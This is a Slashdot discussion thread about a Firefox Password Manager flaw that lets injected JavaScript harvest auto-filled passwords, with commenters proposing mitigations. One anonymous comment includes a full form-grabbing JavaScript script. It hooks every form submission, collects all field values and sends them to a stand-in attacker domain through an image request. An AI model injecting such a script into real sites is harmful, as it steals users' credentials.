Sounds like the exploit relies on auto-enter password fields for a domain, and then using javascript to transmit the value of thte password field to the attacker's machine. So, not so much a coding error as a flaw in the thinking that any password field on a site should be auto-filled in. Requiring some action on the part of the user would help with this, but a better solution would be to move to openID [openid.net].

Safari?? (1)

Pope Raymond Lama (57277) | more than 5 years ago | (#19926913)

Can someone confirm if Safari is actually vulnerable, or if it is just that the author thinks that "all open source browsers are just the same"?

I tried it with Konqueror and default KDE 3.5 password saving tecnhology, and no password leaked this way. I wonder if Safari would have problems there.

Master Password? (1, Interesting)

Anonymous Coward | more than 5 years ago | (#19926931)

I wonder why they didn't mention the "Master Password" feature of the password manager. Every time the password manager activates, it prompts you to type in a single master password. This should be effective in preventing any password harvesting, save for any other bugs that the manager might have.

My Password Manager is My Brain (1)

organgtool (966989) | more than 5 years ago | (#19926957)

It's things like this that force me to disable Password Manager altogether. If only one security hole exists in Password Manager, someone would be able to grab passwords to my bank account, credit card, e-mail, and more. It's a lot harder for the hackers to get the passwords when the only place they are stored is in my head.

With that said, I must admit that I am having more trouble remembering all of my passwords since I acquire more accounts and each account has different password requirements. I wish there would be an official standard for secure passwords so that I could reliably use one password for most of my accounts. Of course, that would also be a security risk because if someone got that password, they would have access to most of my accounts, but that's a separate issue.

Re:My Password Manager is My Brain (1)

kebes (861706) | more than 5 years ago | (#19927003)

It's things like this that force me to disable Password Manager altogether. ... With that said, I must admit that I am having more trouble remembering all of my passwords since I acquire more accounts and each account has different password requirements.
Well my solution is to be selective about what passwords get saved. Low-priority things like slashdot and forum logins are fine for password managers. However I memorize, never write down, and never save passwords for financial sites. This keeps the number of "must-be-memorized" passwords down to a manageable level.

Password managers are not an "all-or-nothing" tool. Use them where they make sense.

Use the Secure Login FF Extension (3, Informative)

EMR (13768) | more than 5 years ago | (#19927069)

By using this extension, the security whole is fixed. Just have to wait around for FF to implement it natively.
This extension provides a *wand* like Opera has. (which is not affected by this security hole, because of this functionality).

https://addons.mozilla.org/en-US/firefox/addon/442 9 [mozilla.org]

Challenge/Response (3, Insightful)

oldmacdonald (80995) | more than 5 years ago | (#19927279)

The "right" solution is to have a challenge/response protocol where your secret key is never sent out of your computer at all. The current password situation is a huge mess since you need a different password for every site or risk one compromised trusted site giving away your password to everything. Most users, even when using a password manager, aren't going to have unique passwords for every site, let alone strong ones. It wouldn't surprise me at all if such a protocol already exists in the HTML standard. It certainly should.

The downsides to this solution? 1) You need to have a browser that supports the protocol (no browsing in telnet). 2) You need to carry around your keys if you want to use them on more than one computer. 3) You need to explain it to users (but hopefully it can be almost transparent). I'm sure there are other problems but the current situation is untenable.

The solution is simple (0)

Anonymous Coward | more than 5 years ago | (#19927317)

This exploit exists for the simple reason that the program which has access to the stored passwords is also the same program that's rendering html and processing javascript and interpreting css and everything else.

Simply store your passwords in a separate program. E.g., Password Gorilla (http://fpx.de/fp/Software/Gorilla/). Then it is a simple matter to use the clipboard to copy the user id's/passwords over to the browser login forms (Password Gorilla makes this a simple right-click operation).

Then disable the browser integrated password manager. If the browser stores no passwords, it can not leak passwords.

Another advantage is that Password Gorilla also includes a strong password generator, so you can generate very good passwords (and use different ones for different sites) and thereby increase your security.

It also runs on both Win and Linux, from the same data files.

It also includes a "merge" functionality so you can keep changes synced between different files (desktop/laptop, etc.).

My Solution (2, Interesting)

fast turtle (1118037) | more than 5 years ago | (#19927383)

While I do use the PW Manager in Firefox, I have never allowed it to retain any critical pw's with those defined as any site where I enter financial or shipping information. For those sites, I use a dedicated PW Manager that allows me to generate more secure passwords using all available characters including special characters.

In the rare case that a website does not accept/allow special characters to be used for passwords, I tend to re-evaluate their value to me. I also notify both the webmaster and customer service that they've reduced the value of their business to me by not accepting secure passwords and that I will no longer deal with them except by a cash-n-carry basis. A few of them have responded positively and after some effort have increased their password security by allowing special characters and thus they've gained an increased level of business from me along with the positive word of mouth advertising to my friends and associates.

Fanboi Fix. (1)

Frankie70 (803801) | more than 5 years ago | (#19927451)

Who found the bug? Can we commision a hit on him?

Ok, I take that back. Forgot this is Firefox, not Safari.

Maybe I'm doing something wrong (or right...) (1)

Vokkyt (739289) | more than 5 years ago | (#19927517)

But I can't seem to get the Browser Check to pull passwords on Safari 2.0 or Mac/Win Firefox with all three using password manager. Is there a specific way that the password manager/auto-fill needs to be set up in order to pull the data?

IE, is this more FUD-ey stuff that is very situational than practical?

Hm.. (1)

Zekasu (1059298) | more than 5 years ago | (#19927541)

The vulnerability only stems from the fact that Firefox puts the passwords into the box.

There is no workaround for this.

So, if you're that worried about your passwords being stolen, don't use the password manager. If you're worried about burgulars, close your window and add some bars. Better yet, get rid fo the window all together.

Kwallet (1)

LuSiDe (755770) | more than 5 years ago | (#19927655)

From the Kwallet handbook [kde.org] (a KDE utility; GNOME has equiv.): The wallet subsytem provides a convenient and secure way to manage all your passwords. I'm not sure if this can be done automatically (integrated in browser) but manually, using a master key/password, it is a good way to store passwords for those with Alzheimer or other memory trouble. One could even use GPG/PGP or TrueCrypt (or LUKS/GELI etcetera) as 'wallet'. As long as you can remember/have the master key its more secure and reliable than (sticky) papers, or a plethora of passwords to remember, or using the same password for various purposes. Just make sure you have this data backed up.

which sites are affected? (1)

psyced (1116901) | more than 5 years ago | (#19927761)

does anyone have a list of sites which are likely to let third parties insert js code?

would myspace, popular for being visually "hackable", or facebook be affected?
facebook in particular lets you add 3rd party extensions to your profile. would
those extensions be able to add appropriate js code to extract your facebook
password from your firefox password manager?

Not a Password Manager issue at all (0)

Anonymous Coward | more than 5 years ago | (#19927783)

Ok, I just RTFA (odd for an Anonymous Coward, I know) but the issue here is not with Password Manager at all. It has to do with community portals allowing people to spoof login pages. It's basic phishing 1.0. Yes, a script could be "injected" to secretly read and report back the issues. But this isn't new to Firefox. The problem is "community sites" that let *ANY MORON CREATE CONTENT* without putting proper safeguards in to stop this kind of abuse. It's not the browser's problem that site admins are too stupid to stop this crap. Any site stupid enough to let me inject scripts into a page gets what they deserve. Hell, I could write a script that works with any JavaScript enabled browser back to Netscape 3.0 to do this. Hell, I can grab any form information if I really want.

In fact, here you go: //written on the fly with no testing.

function stealFormInfo() { //because vbscript is the most evil server-side language ever.
      var stolenInfo = 'http://wwww.myevildomain.com/myevilscript.asp';
      a = 0; //grab every form element
      for (elementname in this.elements) { //and add the name value pair to a querystring.
            stolenInfo += (a)?('&amp;'):('?');
            stolenInfo += elementname + '=' + urlencode(this.elements[elementname].value);
            a++;
      } //fire away
      var sendMe = new Image();
      sendMe.src = stolenInfo; //and return the default onsubmit result (if any)
      return this.oldonsubmit();
}

function doNonthing() { //dummy function.
    return true;
}

if (document.onload) { //hold onto any previously set onload method
    document.oldonload = document.onload;
}
else { //use dummy function instead
    document.oldonload = doNothing;
} //set my own document onload script to set up my form stealing.
document.onload = function setTrap() { //find any forms on the page.
    for (formname in document.forms) {
          if (document.forms[formname].onsubmit) { //hold on to any form's previously set onsubmit method
              document.forms[formname].oldonsubmit = document.forms[formname].onsubmit;
        }
        else { //or use the dummy function
            document.forms[formname].onsubmit = doNothing;
        } //set my own onsubmit method.
        document.forms[formname].onsubmit = stealFormInfo;
    } //fire the previously set onload function (if any);
    document.oldonload();
}

Don't trust embedded Javascript? (1)

Ythan (525808) | more than 5 years ago | (#19927855)

Why not place security restrictions on embedded Javascript? Any website developer worth his or her salt already puts all Javascript in external files. Don't allow embedded Javascript to read password fields or cookies and you make an attacker's job much more difficult. Or so it would seem to me, anyway.

Excuse me (0)

Anonymous Coward | more than 5 years ago | (#19927941)

How about the fact that IE still doesn't even have a passwd manager or any protection for your passwords at all.

Do not use password managers (2, Interesting)

Monsieur_F (531564) | more than 5 years ago | (#19927951)

the resultant need to remember passwords often induces users to choose simplistic passwords and use them on multiple sites.

I rarely use a password manager, because I do not really trust them but also because, just as when using cookies to stay logged on a site, you just do not have to remember your password. This means that when you occasionnally want to log from another computer, for some urgent matter, you cannot find what your password was!

On the other hand, I generally use the same simplistic password on many sites just because there is no critical information on them. On some game sites, the most important information may be my real name and address if there is some incentive for this (read: prizes to win).

Strangely, one really critical site (my banking account) uses a not-so-hard password (6 digits), but this is constrained by the bank itself.

Not my problem (1)

LordSnooty (853791) | more than 5 years ago | (#19928093)

Who on Earth uses the password save feature and expects it to be safe anyway... I mean, come on. I keep my password manager on my USB stick, using a program that doesn't communicate with the network. I don't keep them in the program that will also talk to the site I want to log into. Too much danger that info will leak or a way in will be found... well, whaddayaknow.

Hackproof system (1)

hoppo (254995) | more than 5 years ago | (#19928129)

I have a hackproof system for password management. It's called a "brain." I remember my passwords, then I retrieve them from memory when I need them.
Load More Comments
Slashdot Account

Need an Account?

Forgot your password?

Don't worry, we never post anything without your permission.

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>
Sign up for Slashdot Newsletters
Create a Slashdot Account

Loading...